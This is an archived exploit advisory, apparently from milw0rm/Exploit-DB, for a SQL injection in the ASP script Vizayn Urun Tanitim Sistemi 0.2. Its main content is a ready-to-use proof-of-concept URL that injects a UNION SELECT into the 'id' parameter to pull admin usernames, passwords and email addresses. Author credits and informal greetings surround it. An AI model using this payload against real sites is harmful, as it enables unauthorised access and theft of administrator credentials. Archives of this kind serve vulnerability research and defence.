Vizayn Urun Tanitim Sistemi 0.2 - 'tr' SQL Injection

EDB-ID:

4007

Author:

BAHADIR

Type:

webapps

Platform:

ASP

Published:

2007-05-30

/* Vizayn Urun Tanitim Sistemi v0.2 (tr) Remote SQL Injection Vulnerability
Found by : ertuqrul
PoC By : BAHADIR
Contact: bahadir@bsdmail.org
Scripr HomePage: http://www.vizayn.web.tr/ws.asp?ws=102
Script Demo URL: http://ws.vizaynhosting.com/V02/
Price : 55YTL 

PoF Concept:
Http://[HOST]/[PATH]/default.asp?islem=haberdetay&id=-1%20union%20select%20USERNAME,PASSWORD,EMAIL,USERNAME%20from%20ADMIN
Takes admin username ,password and email adress from admin table 

W0rdz:Maksat Birseyler Eklemek Olsun =)
GreetZ Goes To : BURCU (Her Ne Kadar Bilmesede :D ) Ayrica Dostum Erchin'e ( Ercin Kardesim, Warcraftin Amk. Birak Su Malak Oyunu :D )  
and also to Str0ke For Posting :)
*/

# milw0rm.com [2007-05-30]